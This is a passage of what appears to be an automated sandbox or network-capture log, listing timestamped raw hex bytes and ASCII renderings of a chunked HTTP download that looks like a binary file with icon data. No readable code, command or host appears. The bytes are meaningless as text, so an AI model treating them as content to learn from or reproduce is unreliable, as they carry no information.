9d f3 bc 6f 1c 89 05 30 31 5f
                                                          Data Ascii: 2000fDM0Sc(*2k>&+SZC5HV2/53J8k-RZ`8mPzM>Le)m?%_raH{G[{J&+}`3<n]7]UY#wx_i>T}{9eHF)3Uso!1X!o01_
                                                          2023-01-03 08:46:54 UTC464INData Raw: 42 46 f9 a0 ce ad
                                                          Data Ascii: BF
                                                          2023-01-03 08:46:54 UTC464INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC464INData Raw: 32 30 30 30 0d 0a 30 c4 0a d9 44 1a 94 ce a6 8d 87 1d 43 65 61 b6 47 43 d7 88 9e 3a 39 67 fd a7 6e 20 22 29 59 3b af b9 19 d4 65 ae fa 51 10 6b d2 93 2a d3 a1 ff 44 75 2a 16 4d ea 80 63 93 2a 4c 96 f4 5e 99 41 37 4a a8 a4 7e 14 60 cd 7f 3d 99 5a 7b 37 6f 48 5e f4 65 59 73 bd 93 c5 06 54 2c 1e e4 6e e7 5c 5e ff 39 55 ef 9b 72 28 0d e7 8b 81 93 46 8d b7 98 6b 94 71 46 41 d2 fe 19 9b ca 36 ba 7f 1c 23 14 56 41 85 e1 7a dd 2e 82 da 2a 00 9b 3d 7c 60 bc ae d4 e9 a0 cb 9b 71 af 3f bc b3 75 ea 53 62 15 98 12 ef 52 36 2b bc 1c 91 d7 f7 5a 48 c4 58 e3 36 fa a0 c7 e8 9d 5b 3e 4c ea 24 fe 00 ef 98 b4 b1 87 73 ca 14 c1 1a 2f 3c ee 16 95 f4 a3 f5 cb f0 c7 4c 9c 23 ed ce 44 52 c5 13 67 48 54 69 29 5b 22 d2 2e f0 f6 7c 30 d2 54 76 a2 af 32 29 00 d5 d8 53 ac e4 c2 0d a7
                                                          Data Ascii: 20000DCeaGC:9gn ")Y;eQk*Du*Mc*L^A7J~`=Z{7oH^eYsT,n\^9Ur(FkqFA6#VAz.*=|`q?uSbR6+ZHX6[>L$s/<L#DRgHTi)[".|0Tv2)S
                                                          2023-01-03 08:46:54 UTC472INData Raw: b2 a6 db e1 50 0a
                                                          Data Ascii: P
                                                          2023-01-03 08:46:54 UTC472INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC472INData Raw: 32 30 30 30 0d 0a 40 d7 56 a3 de ce 2c b0 67 34 52 4b c8 95 8d 69 25 3b ec a7 88 2c bd 62 7b c7 5a 51 56 4b f2 2d d9 31 9e 0a f9 cc 64 ec f0 12 33 fd c0 65 93 cc 20 9c ce 7e 51 2a 65 43 bb b9 34 e1 39 45 5b 78 e9 97 0a b8 90 43 49 78 8a f5 18 98 56 1f 8c 10 f4 5c e2 15 60 8a 0a 48 26 79 75 e3 e3 58 7b 3b d7 8a e9 81 a3 a8 00 34 62 f2 24 14 62 1b 65 00 37 0c 52 ab 92 e0 ab 74 59 15 48 f1 0e a4 73 d4 4f 83 f7 21 da 57 49 d7 28 9e d0 c7 da 31 ac a8 36 50 8f f1 31 f6 d8 46 cf 0c a1 d3 88 63 c0 77 9a 3d 20 45 1b 0a 19 1a da 5c b8 8c 43 00 71 34 56 0b 6e a2 2b b8 7b a1 7d 3f 87 8c 3d 7f aa bf 8a 69 9e cf ce 86 d4 44 c7 9e b5 1b f7 92 70 92 ac 99 f2 e6 a8 02 60 c3 38 09 9c 49 04 7d 7b 10 a1 c2 56 69 b9 66 84 f7 be eb 71 56 38 10 9f dd b8 6d 51 4d e8 f4 46 52 66
                                                          Data Ascii: 2000@V,g4RKi%;,b{ZQVK-1d3e ~Q*eC49E[xCIxV\`H&yuX{;4b$be7RtYHsO!WI(16P1Fcw= E\Cq4Vn+{}?=iDp`8I}{VifqV8mQMFRf
                                                          2023-01-03 08:46:54 UTC480INData Raw: 9a 8e 9a 8e 85 96
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC480INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC480INData Raw: 32 30 30 30 0d 0a 9c 8e 8e 9c 0f 4c 8e 9a 8e b2 8e 96 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 0f b7 59 96 81 59 b7 59 e1 e9 e1 59 8a 3b 9a 5e 5e 89 85 e1 b0 85 81 b2 79 b2 ee fc ec 81 fc 8a 81 b7 59 5e c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 96 ec fa 28 d1 1b 76 1b 4d 47 15 76 7b 35 35 12 35 15 15 f6 15 77 26 3d 15 29 29 f6 3d a5 29 3d 3d bf 81 5e c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 81 35 cd 34 83 2c 2c 34 83 2c 8c ba 8c 44 ba 05 56 f8 f8 47 54 76 f0 26 28 fa c8 28 12 29 35 15 15 0c 8e e8 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 6d 47 cd 1e 34 2c 40 2c ba 2c 5b 44 9b d5 21 d1 54 f8 54 f8 1b fa 12 28 7b 12 26 28 28 3d 64 8f 3d 22 67 e8 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 c4 f9 28 16 75 1e 2c 1e ba 2c 2c cc 2c 54 9b ba 1c ba 54 f8 54 56 05 7b 7b 12 47 35 1b 26 12 28 1a
                                                          Data Ascii: 2000LYYYY;^^yY^(vMGv{555w&=))=)==^54,,4,DVGTv&(()5mG4,@,,[D!TT({&((=d="g(u,,,,TTTV{{G5&(
                                                          2023-01-03 08:46:54 UTC488INData Raw: 7f 98 81 7f 80 9a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC488INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC488INData Raw: 32 30 30 30 0d 0a 83 83 80 a6 80 85 80 9b 82 7e 82 a6 92 7f 91 a7 95 96 91 a2 7b 7f 82 a7 7d 7c 7f a1 7e 81 81 a9 81 7c 81 a6 7a 7e 7d 99 7f 82 7e 9e 7f 80 7f a6 80 82 81 a7 93 82 85 a2 7b 7c 80 9e 85 7f 80 b4 7d 7c 7d a5 7f 7e 7e a6 84 7b 7f a6 80 7d 7b a6 89 7c 7b 9b 99 93 aa ad 7e 7e 81 a5 84 7f 85 83 a1 a1 7c 63 9e af 7f 6e a6 a6 7e 70 91 9a 7c 64 00 00 00 00 00 00 00 00 82 a9 81 51 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 8d 80 56 81 7f 7e 82 83 7d 81 a6 a7 a3 a9 a6 9d 97 9e ad 7b 84 83 a3 7e 7a 84 9b 83 81 7a ad 7d 7f 79 9c 82 7b 7b a3 84 81 81 ab 8d 84 8c a7 87 8e 81 a3 7a 82 7c 9d 7d 81 84 94 84 7b 7f a1 80 81 7a a0 84 81 84 9c 81 83 7f 9d 82 84 84 ab 7c 7d 7e ac 8a 7f 7d b0 83
                                                          Data Ascii: 2000~{}|~|z~}~{|}|}~~{}{|{~~|cn~p|dQV~}{~zz}y{{z|}{z|}~}
                                                          2023-01-03 08:46:54 UTC496INData Raw: 81 58 9d 8c 84 5a
                                                          Data Ascii: XZ
                                                          2023-01-03 08:46:54 UTC496INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC496INData Raw: 32 30 30 30 0d 0a 80 82 84 80 81 7b 8e a4 98 7f 7d ab 7f 7f 7d ab 82 82 85 ae 84 83 7a 9d 7b 84 7f a7 92 99 81 9a 84 84 81 ac 7d 7f 7c a5 80 7c 85 af 83 84 7d a2 81 7d 81 b0 86 81 85 b3 80 7d 86 ae 7e 7b 80 a1 81 82 83 a6 7b 82 82 a7 89 83 85 b2 7e 83 7f ad 84 83 79 7f a0 b2 82 55 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 95 a8 82 4c 9a af 80 4f 9b a4 82 54 84 b7 81 68 8f 94 7d 67 8d 9f 82 70 7e 7e 80 82 7e 81 7b a3 8b 89 85 a1 7c 83 80 b1 82 7d 79 a4 84 7d 83 b2 85 82 7c a4 92 a6 85 99 80 80 85 b4 82 7f 7e a7 7e 80 7a a6 80 82 79 9d 81 81 85 a1 95 7d 83 b7 84 85 7d a5 84 84 7e b3 83 85 7e a4 7b 83 7a ab 94 86 84 9e 7e 7e 83 b3 82 7f 7f 82 9f 9f 82 74 a1 ac 7e 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f 90 7e 65 8e
                                                          Data Ascii: 2000{}}z{}||}}}~{{~yULOTh}gp~~~{|}y}|~~zy}}~~{z~~t~p~e
                                                          2023-01-03 08:46:54 UTC504INData Raw: 41 41 41 41 41 41
                                                          Data Ascii: AAAAAA
                                                          2023-01-03 08:46:54 UTC504INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC504INData Raw: 31 66 66 38 0d 0a 41 41 41 41 41 57 67 f3 a1 af bc fe 41 41 41 41 41 41 41 62 cc 8d 1d d0 0c 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 34 b9 a7 c7 4f bc 88 41 41 41 41 1c 12 47 fc 1b 33 46 d0 0c 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 34 b9 6c a1 e6 33 09 79 73 0c 06 c0 1a 18 a6 33 e7 86 52 73 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 76 85 2a af 0a 84 5a 75 ec 64 90 97 46 08 26 0a 2a 97 75 63 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 34 5f 6c 0a 7a c9 e0 bc 30 d5 91 74 d2 d2 20 7a e7 46 88 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 34 5f e7 20
                                                          Data Ascii: 1ff8AAAAAWgAAAAAAAbAAAAAAAAAAAAAAAAAAAAAAAAAAAA4OAAAAG3FAAAAAAAAAAAAAAAAAAAAAAAAAAAA4l3ys3RsAAAAAAAAAAAAAAAAAAAAAAAAAAAAv*ZudF&*ucAAAAAAAAAAAAAAAAAAAAAAAAAAAA4_lz0t zFAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4_
                                                          2023-01-03 08:46:54 UTC512INData Raw: 32 30 30 30 0d 0a
                                                          Data Ascii: 2000
                                                          2023-01-03 08:46:54 UTC512INData Raw: 7f 83 a0 76 7f 8b 9b 6e 7f 98 b3 67 8c a1 99 63 81 8d 9f 66 80 7f 9e 72 92 99 a5 61 8b 9b ad 5e 7a 79 80 7e 60 79 80 7e 81 81 7f 51 9f 7e b1 5f 9b 7f a9 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 86 80 80 65 7f 80 7f 5e 80 88 b8 70 80 7f 9d 72 7f 80 ab 79 80 7f a4 7e 7f 87 a6 77 81 81 b1 73 81 7f a2 77 80 7f 99 65 81 82 9f 5c 7f 80 aa 6b 7f 80 ab 6c 7f 7f a5 60 7f 7f a7 60 7e 80 b3 6e 70 73 7e 90 81 7e 80 9f 81 80 94 92 7f 80 93 98 80 81 8b 9e 80 7e 80 97 76 7b 7f 9d 7f 81 81 80 7f 7f 8c 7f 7e 8a 9a 80 81 80 80 7f 7e 8b 88 71 7f 88 a8 5a 80 89 9c 63 81 81 92 75 80 83 9d 79 7e 9c a5 7c 80 83 aa 76 87 89 a6 6d 91 99 a5 6b 80 7e 81 7d 7a 74 7f 86 71 63 81 7f 84 80 82 5a 8f 7f 9f 5d 91 80 b0 52 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii: vngcfra^zy~`y~Q~_Ye^pry~wswe\kl``~nps~~~v{~~qZcuy~|vmk~}ztqcZ]R
                                                          2023-01-03 08:46:54 UTC520INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC520INData Raw: 32 30 30 30 0d 0a 7e 83 9d 7e 7f 7e 89 80 80 87 91 80 80 8e a3 81 84 7f 95 7e 7f 7e a3 80 7e 7f 7e 81 7f 80 7f 95 6f 80 81 9c 80 81 92 a7 81 7f 81 a2 81 7f 80 a4 80 7f 88 97 7f 80 8c a0 7e 80 7f a1 80 80 80 8a 81 80 80 94 80 81 81 80 7e 80 80 80 81 81 7f 80 7f 7f ab 78 7f 7f ae 63 81 81 b1 6f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 86 7f 58 81 8b 97 66 80 7f 90 7d 80 84 8f 6d 85 80 94 7f 7f 80 88 7e 7f 84 83 80 7e 7f a8 7e 7e 81 a3 7f 84 7e 9c 80 80 80 7f 7f 7e 7e 81 92 7f 7f 81 90 80 81 8b 83 80 7e 7f 93 7f 7e 80 9e 80 81 7f 94 7f 80 80 9a 7e 7f 80 7f 81 81 80 80 7f 81 7f 7e 80 7f 81 80 81 80 92 7c 82 7f a8 80 80 7e 8d 79 7f 92 96 72 7f 8b 99 78 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 90 80 5b 80 87 a2 76 7f
                                                          Data Ascii: 2000~~~~~~~o~~xcoIXf}m~~~~~~~~~~~|~yrxa[v
                                                          2023-01-03 08:46:54 UTC528INData Raw: ff ff ff ff ff ff
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC528INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC528INData Raw: 32 30 30 30 0d 0a ff ff ff ff ff ff df ff fc 7f 00 ff e0 06 00 ff 80 00 00 7f 80 00 00 7f 00 00 00 7f 00 00 00 7f 00 00 00 7f 00 00 00 7f 80 00 00 ff 80 00 00 ff c0 00 01 ff e0 00 03 ff f0 00 03 ff f0 00 07 ff e0 00 1f ff e0 00 3f ff e0 00 3f ff e0 00 3f ff e0 00 3f ff e0 00 7f ff f0 00 7f ff fc 01 ff ff ff ff ff ff ff ff ff ff 28 00 00 00 10 00 00 00 20 00 00 00 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 3a 3a 00 7e 80 92 00 bd 81 7f 00 7f 38 81 00 7f 80 7f 00 38 3e 3c 00 81 7f a4 00 7e 66 3f 00 87 7e ba 00 81 81 93 00 81 7f 7e 00 80 81 a6 00 63 7f 80 00 81 7e 7f 00 b5 98 51 00 44 44 3d 00 80 7f 93 00 81 31 67 00 bb 7f c1 00 80 80 8b 00 80 7f 80 00 bf 8d b6 00 46 3e 40 00 80 80 81 00 7f 80 97 00 76 81 80 00 7f
                                                          Data Ascii: 2000????( l::~88><~f?~~c~QDD=1gF>@v
                                                          2023-01-03 08:46:54 UTC536INData Raw: 80 71 7f 84 81 5a
                                                          Data Ascii: qZ
                                                          2023-01-03 08:46:54 UTC536INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC536INData Raw: 32 30 30 30 0d 0a 80 aa aa 6c 7f ab aa 5d 7f 99 9d 5c 7e a7 99 61 81 a4 99 60 80 b1 a5 64 7f a7 99 5c 81 b1 a4 47 87 7f 80 60 97 81 7e 64 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9e a0 6a 80 a9 7f 76 80 9e 7e 6f 7e ac 84 67 7f 7f 81 7e 61 7f 81 9a 6c 80 7f 91 61 7f 81 a3 80 80 8f 94 80 8f a5 a1 80 7f a3 9a 80 80 96 96 80 7e 8b 9f 80 80 a6 9d 7f 7e b2 95 81 80 91 95 7f 7f a7 9a 81 80 9e 8f 7e 81 91 92 81 80 af a4 7f 7e 92 9d 81 8e 97 9b 80 81 95 95 80 7f 97 9c 81 80 8e 9b 81 88 9c 8f 7e 8a 9f 9e 7f 86 96 a6 7f 80 80 a1 76 80 7f b2 7c 7e 7e a6 72 7f 80 7f 81 80 80 73 81 a4 b2 7a 81 ae ab 64 80 aa ab 62 7e a8 98 63 7f ad ae 5a 7f a6 9c 5f 7f 89 83 62 7f 81 7f 6d 7f 7f 80 51 81 80 7f 62 99 80 7f 5b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                          Data Ascii: 2000l]\~a`d\G`~djv~o~g~ala~~~~~v|~~rszdb~cZ_bmQb[
                                                          2023-01-03 08:46:54 UTC544INData Raw: 8f 9c 81 80 82 80
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC544INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC544INData Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 61 7f 7e 80 7f 7f 91 90 7e 81 9d 95 7f 7f 80 98 7e 7f 96 a1 80 7f 91 a0 7e 7e 7f 9a 7f 7f 88 a0 80 80 81 9d 80 80 81 a7 80 80 80 9a 7f 80 86 9f 80 7f 8e 9b 7e 7f 81 9f 80 7e a8 a2 7e 80 95 9e 80 80 a1 9f 81 80 a8 ab 7f 81 a7 a3 80 7f 99 96 79 7f 82 96 80 7f 7e 6a 00 00 00 00 00 00 00 00 71 80 7f 7f 7d 7f 7f 7f 7f 80 88 9a 6a 7f 80 a8 80 80 81 9d 80 80 8b 93 81 7f aa 93 7f 81 96 a2 80 81 a0 a2 7f 7e a1 95 7f 7f 8b ac 81 7f 80 8c 7f 7f 80 a8 81 80 98 ac 80 81 9d 9f 7f 7f 99 ae 81 7f a4 94 80 81 8d 94 80 81 9b 98 80 80 95 94 68 81 7f 7f 80 96 7f 60 00 00 00 00 00 00 00 00 7f a0 9c 5d 7f 80 80 80 78 80 7e 7f 7d 81 7f 9c 80 7e 8a 95 80 81 95 a2 80 80 8e a4 7f 7f 9d 93 7f 7e a2 93 81 81 a6 a2 81 80 92 a4 7e 7f 7f 9e 80
                                                          Data Ascii: 2000a~~~~~~~~y~jq}j~h`]x~}~~~
                                                          2023-01-03 08:46:54 UTC552INData Raw: 8f fc fc fc fc fc
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC552INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC552INData Raw: 32 30 30 30 0d 0a 59 ec 25 25 25 25 25 25 08 c6 26 68 68 e9 68 e9 68 68 e9 51 af 6d f5 64 c9 72 f2 08 08 08 08 08 ce 25 25 25 25 25 25 25 08 c6 10 ad ad ad 93 cd ad cd cd 6f 3e 36 dc 3a 63 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 08 f8 c6 c6 ab ab 11 ab ab 11 12 6b eb b6 bb 6b 5f 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 08 08 08 08 08 08 08 08 b5 f1 e1 c4 f3 54 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 30 fe 28 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25
                                                          Data Ascii: 2000Y%%%%%%&hhhhhQmdr%%%%%%%o>6:c%%%%%%%%%%%%%%%kk_%%%%%%%%%%%%%%%%T%%%%%%%%%%%%%%%%%%%%%%%%%%%0(%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
                                                          2023-01-03 08:46:54 UTC560INData Raw: bd c6 81 96 cf d3
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC560INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC560INData Raw: 32 30 30 30 0d 0a 7e b1 c0 c0 97 ba c3 d2 7e 7e b2 d0 3c 7f 90 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3d 80 97 c9 7f 7f b2 cb 8c ae c3 c9 80 99 c4 cd 80 90 bf c4 81 98 c8 c5 80 97 c8 cb 80 8c c1 ca 80 8e c2 c4 7e 8d c3 c9 80 8a c5 c5 80 97 c7 ce 7e 8f ca cf 7e 8b bb c6 81 87 c7 c9 80 8f c7 cc 80 8f cf c4 7f 8f ba c0 81 8c d0 bf 7f 8f c3 d2 7f 94 c1 c5 75 7f 80 cd 43 80 62 ce 7e ab 98 c2 81 ae 81 cc 7e b1 80 c0 81 b8 7f cc c0 cb bb d1 48 80 64 d0 7a 7f 7f c8 7e a8 c4 cb 7f ae c2 cb 7f a2 ca c6 80 ad c2 c1 7f a3 c7 cf 7f 9e ca d1 80 a8 c8 c6 7f b1 bb d0 81 a2 cd c6 81 ac c5 c6 7e bc cc d7 7f 80 b2 bd 34 81 9b cd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c6 cb 98 3b 3d 80 88 c9 7f 7e b1 c5 86 b8 cd c6 7f 91 be c0 7f 9a c4 c6 7f
                                                          Data Ascii: 2000~~~<=~~~uCb~~Hdz~~4;=~
                                                          2023-01-03 08:46:54 UTC568INData Raw: 64 c1 7e 9a 81 c8
                                                          Data Ascii: d~
                                                          2023-01-03 08:46:54 UTC568INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC569INData Raw: 31 66 66 38 0d 0a 80 c4 82 c6 7e a3 7e c5 45 80 63 bf 56 80 69 7f a5 d9 a0 3e a8 d0 97 45 aa d4 94 3a b2 cb 93 3d af d0 9d 3b ac d1 9c 36 c4 d8 7f 42 b5 c7 88 41 b7 c9 88 33 b0 cc 80 3d bd c5 8d 44 cb ce 80 2e 00 00 00 00 00 00 00 00 c3 d9 99 2f 7f 8a a1 42 3f 81 90 c6 3c 80 8f d2 4e 7e 9a cd 40 80 96 c0 45 81 83 d9 43 80 91 cf 4b 7f 99 c8 3e 7e 8c d2 44 80 80 c9 41 7e 5c bf 7d 80 81 c2 7e 91 80 cc 73 81 7f ca 3e 7e 61 b7 56 81 61 7f 7f 80 7f 4d a9 da 99 36 a4 d1 98 4a 9d cf a4 47 b4 d4 9b 42 a4 c9 8e 43 a4 d3 92 44 a0 d4 a1 43 b1 c9 98 36 ad c5 9e 3b af d4 8c 38 b5 d2 99 38 b5 d3 90 35 b1 cc 92 31 bf c8 96 2f 00 00 00 00 00 00 00 00 00 00 00 00 c0 d1 97 2b c3 ca a9 2f ab cb a5 32 b1 ce 95 3c a7 d5 98 4c ae cb 7f 40 b5 c9 8d 59 80 81 81 7f 80 81 7e 81 7f
                                                          Data Ascii: 1ff8~~EcVi>E:=;6BA3=D./B?<N~@ECK>~DA~\}~s>~aVaM6JGBCDC6;8851/+/2<L@Y~
                                                          2023-01-03 08:46:54 UTC577INData Raw: 32 30 30 30 0d 0a
                                                          Data Ascii: 2000
                                                          2023-01-03 08:46:54 UTC577INData Raw: 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 07 ff 00 00 0f ff fc 00 1f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 28 00 00 00 18 00 00 00 30 00 00 00 01 00 08 00 00 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 4a 3d 41 00 7e 7f 80 00 43 4f 4a 00 4b 42 44 00 7f 7f 7f 00 3e 49 44 00 42 42 4d 00 a8 96 7f 00 4b 3d 4f 00 52 45 44 00 7e 8c 81 00 7f 7e 7f 00 96 7f 84 00 a2 b2 a9 00 7e 87 89 00 7e 7f 80 00 a9 92 81 00 a4 9d 81 00 80 7f 7f 00 85 81 7e 00 42 4b 45 00 9e 92 88 00 7e 81 81 00 7f 80 81 00 7f 80 7e 00 81 7e 80
                                                          Data Ascii: (0@J=A~COJKBD>IDBBMK=ORED~~~~~BKE~~~
                                                          2023-01-03 08:46:54 UTC585INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC585INData Raw: 32 30 30 30 0d 0a 80 80 7f 9c 7f 87 84 a3 91 a5 9c 9c 81 7f 7f 9b 7e 80 80 94 7e a1 80 5a 7e be 7f 61 80 a1 81 59 80 ad 7f 59 00 00 00 00 00 00 00 00 ad 98 86 3b 97 9a 8d 43 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 ae 92 5d 86 a0 7e 6d 91 ad 80 5c 80 7f 7f a4 7f 80 80 9b 9b 9f a7 a2 9a 9a 8b a1 7e 80 80 a0 7f 80 80 93 96 94 8f a5 9c 98 93 9a 9b 92 96 ae 94 a5 93 98 a4 a2 95 99 a9 9a a5 9d a9 a7 a8 99 a5 9f 97 a8 9f 99 9c 97 b3 a5 8f a6 a5 9c 92 a8 a8 ab 96 9b 9b 9a 97 9c 92 9e 98 9d 97 ad 98 a8 a5 a4 9e 9f 9b ae ab a5 a9 95 99 a9 87 a5 8c a1 80 80 80 9c 80 7f 7e a8 7f 84 7f 9c 93 a1 99 ab 80 80 7f 96 80 81 81 9f 90 a4 80 63 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9a 92 84 4b 00 00 00 00 00 00 00 00 00
                                                          Data Ascii: 2000~~Z~aYY;C]~m\~~cK
                                                          2023-01-03 08:46:54 UTC593INData Raw: 7f 7f 81 80 81 af
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC593INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC593INData Raw: 32 30 30 30 0d 0a 81 80 80 a2 7f 80 81 b5 81 7f 80 9c 7e 81 80 9d 7e 7e 7f a2 81 7f 81 a5 7f 7e 7f 98 80 7f 7f a4 7e 80 80 a2 80 7e 7e ae 7f 81 7e a3 80 80 7e a4 7e 80 7f 9d 7e 81 80 99 7e 7e 7f 88 7f 7f 81 a0 80 81 7f 7f 7f a1 81 6f 80 b9 80 6f 7e ac 7f 64 59 9c 7e 50 1a e6 77 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7f ad 7f 5d 80 b4 80 58 80 a1 7f 55 87 b0 91 59 7e ad 9a 61 80 ab 89 5f 00 00 00 00 81 a6 8d 55 80 8d 98 5d 80 8d 8a 5e 81 97 89 73 89 97 82 5e 9f a1 7e 63 8f 95 7f 66 9e 9c 81 62 9a a1 80 63 95 ae 81 6c 84 a7 81 5b 8f a7 7e 58 8b aa 7f 65 8f a7 7e 61 8e aa 7f 59 9e be 7e 63 7e a3 80 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8f a0 7f 42 89 b2 7e 3e 80
                                                          Data Ascii: 2000~~~~~~~~~~~~~oo~dY~Pw]XUY~a_U]^s^~cfbcl[~Xe~aY~c~lB~>
                                                          2023-01-03 08:46:54 UTC601INData Raw: ff ff ff ff 00 00
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC601INData Raw: 0d 0a
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC601INData Raw: 32 30 30 30 0d 0a 28 00 00 00 20 00 00 00 40 00 00 00 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8a 81 7f 00 8b 80 7e 00 80 4e 7f 00 9d 80 a7 00 7f 7d b5 00 81 81 8f 00 a8 81 7f 00 6d 50 7f 00 9e 88 99 00 5c 5b 56 00 80 55 7f 00 a8 a8 ab 00 80 ad 7f 00 84 80 80 00 7f 7c 59 00 7f 80 b6 00 5f 49 4a 00 7e 96 5c 00 7f 81 a0 00 7f 89 a2 00 7f 52 80 00 82 84 99 00 8d 50 9f 00 81 81 7e 00 7e 4c 80 00 7f 5f 55 00 9d b0 81 00 80 80 55 00 a1 81 7f 00 80 80 48 00 7f 7e b3 00 80 7e a3 00 96 63 a9 00 80 58 a8 00 81 7f a5 00 a1 ac a3 00 80 7e 80 00 7f 57 79 00 80 58 56 00 9f 80 80 00 a8 85 7f 00 ad 98 9f 00 7f 5a 7e 00 7f 7e 7f 00 7e 81 7f 00 7e 53 61 00 ae af aa 00 99 7e 80 00 80 7f b1 00 a3 5f 5c 00 7e a9 7f 00 7c 4e 58 00 80
                                                          Data Ascii: 2000( @~N}mP\[VU|Y_IJ~\RP~~L_UUH~~cX~WyXVZ~~~~Sa~_\~|NX
                                                          2023-01-03 08:46:54 UTC609INData Raw: 91 9f a0 84 97 9b
                                                          Data Ascii:
                                                          2023-01-03 08:46:54 UTC609INData Raw: 0d 0a
                                                          Data Ascii:
